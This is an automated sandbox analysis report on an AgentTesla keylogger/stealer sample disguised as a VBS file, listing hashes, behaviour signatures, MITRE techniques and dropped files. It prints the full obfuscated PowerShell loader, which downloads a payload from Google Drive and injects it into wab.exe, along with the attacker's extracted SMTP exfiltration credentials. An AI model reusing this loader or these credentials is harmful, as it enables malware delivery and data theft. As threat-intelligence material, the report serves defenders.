agenttesla | 27438e31d5f47cd00c0f95379ba8516a439efb1291386d26742720e4d5dabe39

General

Target

MÁY LASER SOL E&C_FIBER_20240515.vbs
Size

428KB
MD5

63c9e6885ce22fe4f260b7415e8dcd57
SHA1

d469f256e344841ed4fb2cd5f977ebecba23d397
SHA256

27438e31d5f47cd00c0f95379ba8516a439efb1291386d26742720e4d5dabe39
SHA512

12accf888566b98277c095e830cb21d7cc11be582036da57a17437da43e32d9158f399acc5e3cea9679fc0655a3b5ac8d0a8a8e947988b9776c0d965f4a6dfc3
SSDEEP

6144:0y4t1fXGwzkAitPzmeI9OQYypkHkSVdtxQ+5iYgbAL0WMhw19+z0yhtHn9eq/+4K:0VJv0ayfOb64MRycngoavbN0vBrbNt7

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.z2neumec.com
Port:
587
Username:
[email protected]
Password:
Gid@2021

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.z2neumec.com
Port:
587
Username:
[email protected]
Password:
Gid@2021
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2124	WScript.exe
5	2620	powershell.exe
7	2620	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
10	drive.google.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	api.ipify.org
15	api.ipify.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2972	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2980	powershell.exe
2972	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2980 set thread context of 2972	2980	powershell.exe	34

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2620	powershell.exe
2980	powershell.exe
2980	powershell.exe
2972	wab.exe
2972	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2980	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2620	powershell.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	2972	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2124 wrote to memory of 2620	2124	WScript.exe	29
PID 2124 wrote to memory of 2620	2124	WScript.exe	29
PID 2124 wrote to memory of 2620	2124	WScript.exe	29
PID 2620 wrote to memory of 2504	2620	powershell.exe	31
PID 2620 wrote to memory of 2504	2620	powershell.exe	31
PID 2620 wrote to memory of 2504	2620	powershell.exe	31
PID 2620 wrote to memory of 2980	2620	powershell.exe	32
PID 2620 wrote to memory of 2980	2620	powershell.exe	32
PID 2620 wrote to memory of 2980	2620	powershell.exe	32
PID 2620 wrote to memory of 2980	2620	powershell.exe	32
PID 2980 wrote to memory of 1940	2980	powershell.exe	33
PID 2980 wrote to memory of 1940	2980	powershell.exe	33
PID 2980 wrote to memory of 1940	2980	powershell.exe	33
PID 2980 wrote to memory of 1940	2980	powershell.exe	33
PID 2980 wrote to memory of 2972	2980	powershell.exe	34
PID 2980 wrote to memory of 2972	2980	powershell.exe	34
PID 2980 wrote to memory of 2972	2980	powershell.exe	34
PID 2980 wrote to memory of 2972	2980	powershell.exe	34
PID 2980 wrote to memory of 2972	2980	powershell.exe	34
PID 2980 wrote to memory of 2972	2980	powershell.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MÁY LASER SOL E&C_FIBER_20240515.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2124
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Pairpigernes = 1;$Primfaktorerne='Su';$Primfaktorerne+='bstrin';$Primfaktorerne+='g';Function bikuber($Takometret){$Skinproblemet=$Takometret.Length-$Pairpigernes;For($Analyserammer71=1;$Analyserammer71 -lt $Skinproblemet;$Analyserammer71+=2){$Damoklessvrds199+=$Takometret.$Primfaktorerne.Invoke( $Analyserammer71, $Pairpigernes);}$Damoklessvrds199;}function Gennemsyrendes42($Ingates){. ($Atimon) ($Ingates);}$Tilgifts=bikuber ',M otzCi lTlFae/I5 .,0. I(EWSi nGdDoCw s. PNST, 1 0D..0.;, W iMn 6C4.;C .xP6c4,;S .rfvS: 1Q2G1 .,0 )M EGPeRc.k,o /.2 0,1.0.0 1U0W1A F iEr eVf,oBx /L1,2R1L. 0 ';$Womanishness=bikuber ' U s e rC-EASgPe n.t ';$skilberne=bikuber 'Ih,t.tRp s.:D/ /Sd rEi vHeO.,gHo o g l.e,..c.o.mT/,uEc ?Be.x.p.ocrPtS=LdFoBw n lEo,aMdS&hi,d =,1Px Y fUYTZ.E OV5tTElI9 z EUx,X zMRD_ g 6 LPwcT e.H c ZSJ k Z PBi. ';$Monkishly=bikuber 'C>A ';$Atimon=bikuber 'Oi eCx ';$Daekkede='Recontrolling';Gennemsyrendes42 (bikuber 'TSReItS-FC ounUtSe nRt. ,-UPDa,t h MT.:P\OPTr e iOnrd,uMl.g e . t,x t B- V a.l u e S$.Dga.e,kAk eHd eV; ');Gennemsyrendes42 (bikuber ',iDf T( tBeWs t.-,p.aPtShU T :,\UPKrFeViBnBdUu,l gSe ..t x t,)A{Ue.x iJt }W; ');$Liebhaveri = bikuber 'EeNc,h oF U% a.p p,dPaEtSa %.\SAMfSdGd e,. W o.oA A&D&C eAcbh,o A$ ';Gennemsyrendes42 (bikuber ' $Pg.l.oAbUaTl : MGa.h s e e rE=d(,cUmUdr M/Hc P$TL iAe,b,h a vTe r.iG)a ');Gennemsyrendes42 (bikuber ' $Dg lSoBbSaGl :FBUe s i dad.edl sBe.rkn,e =A$WsDk i,lPbBeCrUn eS.LsSp lMiSt ( $ M,o,n,k iLsPhUlUyN). ');$skilberne=$Besiddelserne[0];Gennemsyrendes42 (bikuber 'D$Tg lho bAa.l.:BAKsSs eesNs,oCrTsR=IN eKw - O,bGjPepc tM WSDyGs t,eEm..,N eFt . W eRbSC lBi e,nRt. ');Gennemsyrendes42 (bikuber ' $LAVs sAe,s,s,oFr sM..H.eSa.d.e r,s [,$AWCo.m aFn i,s,hSnKeSs s ]T=F$ T islCg iDf tBs ');$Ekstraparlamentarisk=bikuber ',AusKs.e s s o.r s,..DToBwWnKl o.a dSFsiSlBes(T$,sKkPi,lSbSe rAn eS,D$.BsaStbtGlDeEfFrMoUnUt s.)T ';$Ekstraparlamentarisk=$Mahseer[1]+$Ekstraparlamentarisk;$Battlefronts=$Mahseer[0];Gennemsyrendes42 (bikuber ' $fgOlHo bNaLlG:SB aas.iHsEb oTg.e nLs,= (ATCe sPtC-LPOa tSh .$VBFa,tNt l ePfTr.o nKt,s.)B ');while (!$Basisbogens) {Gennemsyrendes42 (bikuber 'D$ gBlBoTb a l :,ADr bCeLjVd sPtVa.g.e r eRnA= $MtNrBure ') ;Gennemsyrendes42 $Ekstraparlamentarisk;Gennemsyrendes42 (bikuber ' S.tKa rIt,-hSfl eGe p B4A ');Gennemsyrendes42 (bikuber 'T$Sg.l oGb a l :,B aUs iasSb oog eWn.sS=F(,T.e sAtP-CPbaAtfhO M$CB a t t l,eFf.r o.nPtEs )G ') ;Gennemsyrendes42 (bikuber 'M$Gg,l o,b.a.lS: D,rAaSgVe,fHl yUv.nSiFnSgUe nU=G$Dg lSo bFa lB: DsiAv iVd e nVd e.nU5a8 +.+D%A$ BIeasHiUdSdkeOlRs eBr.nJe .Sc oTuDn.t ') ;$skilberne=$Besiddelserne[$Drageflyvningen];}$Afgiftspolitiske=366875;$Uncholeric80=25858;Gennemsyrendes42 (bikuber ' $.g lHo bNaNl :MDge mTi,pSlSa cFa t eI .=S G eetA-,C.oRnMtHeEn t, L$FB,aRt t,l,e fGrNoSn t sR ');Gennemsyrendes42 (bikuber 'L$RgYlNo bDa,l,:,S,pPoSrBs kAi.f,t eR ,=R ,[ S ySsAtFeAmF.BC.o niv eBr.t ]D: :LFSrboOmTBHaSs.eP6H4ISStPr iAnHg.( $ DSe mTi p.lRaEcFa tSeF) ');Gennemsyrendes42 (bikuber 'O$fg.l.oSbBaSlU:MCSo.l.lNe c,t.iCoAn sR F=P ,[,STy,s t,e.mH. TCe x,tc.UE nEc o,dPi nFgM] :H: A S C IhIM.HG e.tSS tFr.iAnkgV( $VS pCo rPsOk isfFt e ) ');Gennemsyrendes42 (bikuber ' $ g l oHbUajl :FSSuab s i b,i l.a,nCt lPyO=N$MCSoTl.l eXcMtriGoMnTs .Js uMb,sItDr i.nUgS(,$,ASf,g,i.fAtCsGpPoPl,i t iss kUeC, $ UKnEcShOo lse rFi cT8P0.). ');Gennemsyrendes42 $Subsibilantly;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2620
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Afdde.Woo && echo $"
    3⤵
    PID:2504
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Pairpigernes = 1;$Primfaktorerne='Su';$Primfaktorerne+='bstrin';$Primfaktorerne+='g';Function bikuber($Takometret){$Skinproblemet=$Takometret.Length-$Pairpigernes;For($Analyserammer71=1;$Analyserammer71 -lt $Skinproblemet;$Analyserammer71+=2){$Damoklessvrds199+=$Takometret.$Primfaktorerne.Invoke( $Analyserammer71, $Pairpigernes);}$Damoklessvrds199;}function Gennemsyrendes42($Ingates){. ($Atimon) ($Ingates);}$Tilgifts=bikuber ',M otzCi lTlFae/I5 .,0. I(EWSi nGdDoCw s. PNST, 1 0D..0.;, W iMn 6C4.;C .xP6c4,;S .rfvS: 1Q2G1 .,0 )M EGPeRc.k,o /.2 0,1.0.0 1U0W1A F iEr eVf,oBx /L1,2R1L. 0 ';$Womanishness=bikuber ' U s e rC-EASgPe n.t ';$skilberne=bikuber 'Ih,t.tRp s.:D/ /Sd rEi vHeO.,gHo o g l.e,..c.o.mT/,uEc ?Be.x.p.ocrPtS=LdFoBw n lEo,aMdS&hi,d =,1Px Y fUYTZ.E OV5tTElI9 z EUx,X zMRD_ g 6 LPwcT e.H c ZSJ k Z PBi. ';$Monkishly=bikuber 'C>A ';$Atimon=bikuber 'Oi eCx ';$Daekkede='Recontrolling';Gennemsyrendes42 (bikuber 'TSReItS-FC ounUtSe nRt. ,-UPDa,t h MT.:P\OPTr e iOnrd,uMl.g e . t,x t B- V a.l u e S$.Dga.e,kAk eHd eV; ');Gennemsyrendes42 (bikuber ',iDf T( tBeWs t.-,p.aPtShU T :,\UPKrFeViBnBdUu,l gSe ..t x t,)A{Ue.x iJt }W; ');$Liebhaveri = bikuber 'EeNc,h oF U% a.p p,dPaEtSa %.\SAMfSdGd e,. W o.oA A&D&C eAcbh,o A$ ';Gennemsyrendes42 (bikuber ' $Pg.l.oAbUaTl : MGa.h s e e rE=d(,cUmUdr M/Hc P$TL iAe,b,h a vTe r.iG)a ');Gennemsyrendes42 (bikuber ' $Dg lSoBbSaGl :FBUe s i dad.edl sBe.rkn,e =A$WsDk i,lPbBeCrUn eS.LsSp lMiSt ( $ M,o,n,k iLsPhUlUyN). ');$skilberne=$Besiddelserne[0];Gennemsyrendes42 (bikuber 'D$Tg lho bAa.l.:BAKsSs eesNs,oCrTsR=IN eKw - O,bGjPepc tM WSDyGs t,eEm..,N eFt . W eRbSC lBi e,nRt. ');Gennemsyrendes42 (bikuber ' $LAVs sAe,s,s,oFr sM..H.eSa.d.e r,s [,$AWCo.m aFn i,s,hSnKeSs s ]T=F$ T islCg iDf tBs ');$Ekstraparlamentarisk=bikuber ',AusKs.e s s o.r s,..DToBwWnKl o.a dSFsiSlBes(T$,sKkPi,lSbSe rAn eS,D$.BsaStbtGlDeEfFrMoUnUt s.)T ';$Ekstraparlamentarisk=$Mahseer[1]+$Ekstraparlamentarisk;$Battlefronts=$Mahseer[0];Gennemsyrendes42 (bikuber ' $fgOlHo bNaLlG:SB aas.iHsEb oTg.e nLs,= (ATCe sPtC-LPOa tSh .$VBFa,tNt l ePfTr.o nKt,s.)B ');while (!$Basisbogens) {Gennemsyrendes42 (bikuber 'D$ gBlBoTb a l :,ADr bCeLjVd sPtVa.g.e r eRnA= $MtNrBure ') ;Gennemsyrendes42 $Ekstraparlamentarisk;Gennemsyrendes42 (bikuber ' S.tKa rIt,-hSfl eGe p B4A ');Gennemsyrendes42 (bikuber 'T$Sg.l oGb a l :,B aUs iasSb oog eWn.sS=F(,T.e sAtP-CPbaAtfhO M$CB a t t l,eFf.r o.nPtEs )G ') ;Gennemsyrendes42 (bikuber 'M$Gg,l o,b.a.lS: D,rAaSgVe,fHl yUv.nSiFnSgUe nU=G$Dg lSo bFa lB: DsiAv iVd e nVd e.nU5a8 +.+D%A$ BIeasHiUdSdkeOlRs eBr.nJe .Sc oTuDn.t ') ;$skilberne=$Besiddelserne[$Drageflyvningen];}$Afgiftspolitiske=366875;$Uncholeric80=25858;Gennemsyrendes42 (bikuber ' $.g lHo bNaNl :MDge mTi,pSlSa cFa t eI .=S G eetA-,C.oRnMtHeEn t, L$FB,aRt t,l,e fGrNoSn t sR ');Gennemsyrendes42 (bikuber 'L$RgYlNo bDa,l,:,S,pPoSrBs kAi.f,t eR ,=R ,[ S ySsAtFeAmF.BC.o niv eBr.t ]D: :LFSrboOmTBHaSs.eP6H4ISStPr iAnHg.( $ DSe mTi p.lRaEcFa tSeF) ');Gennemsyrendes42 (bikuber 'O$fg.l.oSbBaSlU:MCSo.l.lNe c,t.iCoAn sR F=P ,[,STy,s t,e.mH. TCe x,tc.UE nEc o,dPi nFgM] :H: A S C IhIM.HG e.tSS tFr.iAnkgV( $VS pCo rPsOk isfFt e ) ');Gennemsyrendes42 (bikuber ' $ g l oHbUajl :FSSuab s i b,i l.a,nCt lPyO=N$MCSoTl.l eXcMtriGoMnTs .Js uMb,sItDr i.nUgS(,$,ASf,g,i.fAtCsGpPoPl,i t iss kUeC, $ UKnEcShOo lse rFi cT8P0.). ');Gennemsyrendes42 $Subsibilantly;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2980
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Afdde.Woo && echo $"
      4⤵
      PID:1940
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
79c16b8464a2c6fa8e4e4abc6a79839c

SHA1
0da39ce052360c4c8c0413cdffa02c84fc710d9c

SHA256
fb1de258dc5880f750a0943c78fd8150aba697e1bccd9852a15003225671f0b2

SHA512
9d8d740be9dc186891fe7ae99f996e645abf129496b374a3f62be753505bfb1628f16c61e2c1d3ddfee6a918604149504e983fcffed44ba87bbfc0227a7bb96d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3008.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarBECE.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Afdde.Woo

Filesize
511KB

MD5
ac1f4a575a29efd580486f8b4da7d4ce

SHA1
e01480adb3540c6efab5e6811a284eaecb3a80b9

SHA256
534464c375431a2ba1e85c9dbbd6662a97048f1381f96384e5ca65d57b3a5e4d

SHA512
2f020e4d95aab7e27c3415c3fe9ee79f9a1ec987574268791c1788d9a7fe7379b00be22232e33c6a7d23f5467098b48113af549fcf9246ec46c23b2fe4bd96c9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\APLEKL455KMYI3DHJC3I.temp

Filesize
7KB

MD5
966033dd781bb2884e5ce8925a97498a

SHA1
f4b9edcee8d6bfd99ff343f3e049e4a9e7723d6e

SHA256
3a8a4a227eb0c3309cff62a22dbce71c2f5e709ff8fa36e501b4352b356b6188

SHA512
f3946cd2588141e3e311a25fd979d52d475c7ba6952bb9c5b1e3a541c6a0a403b2a588ee3a7ba34176dcdc30c55d892450aa021f880636e9138d26c62da1548f

Download Submit
memory/2620-22-0x0000000001D70000-0x0000000001D78000-memory.dmp

Filesize
32KB

Download
memory/2620-34-0x000007FEF605E000-0x000007FEF605F000-memory.dmp

Filesize
4KB

Download
memory/2620-26-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

Filesize
9.6MB

Download
memory/2620-24-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

Filesize
9.6MB

Download
memory/2620-23-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

Filesize
9.6MB

Download
memory/2620-61-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

Filesize
9.6MB

Download
memory/2620-33-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

Filesize
9.6MB

Download
memory/2620-25-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

Filesize
9.6MB

Download
memory/2620-21-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2620-20-0x000007FEF605E000-0x000007FEF605F000-memory.dmp

Filesize
4KB

Download
memory/2972-58-0x0000000000770000-0x00000000017D2000-memory.dmp

Filesize
16.4MB

Download
memory/2972-59-0x0000000000770000-0x00000000017D2000-memory.dmp

Filesize
16.4MB

Download
memory/2972-60-0x0000000000770000-0x00000000007B2000-memory.dmp

Filesize
264KB

Download
memory/2980-32-0x0000000006630000-0x0000000008499000-memory.dmp

Filesize
30.4MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads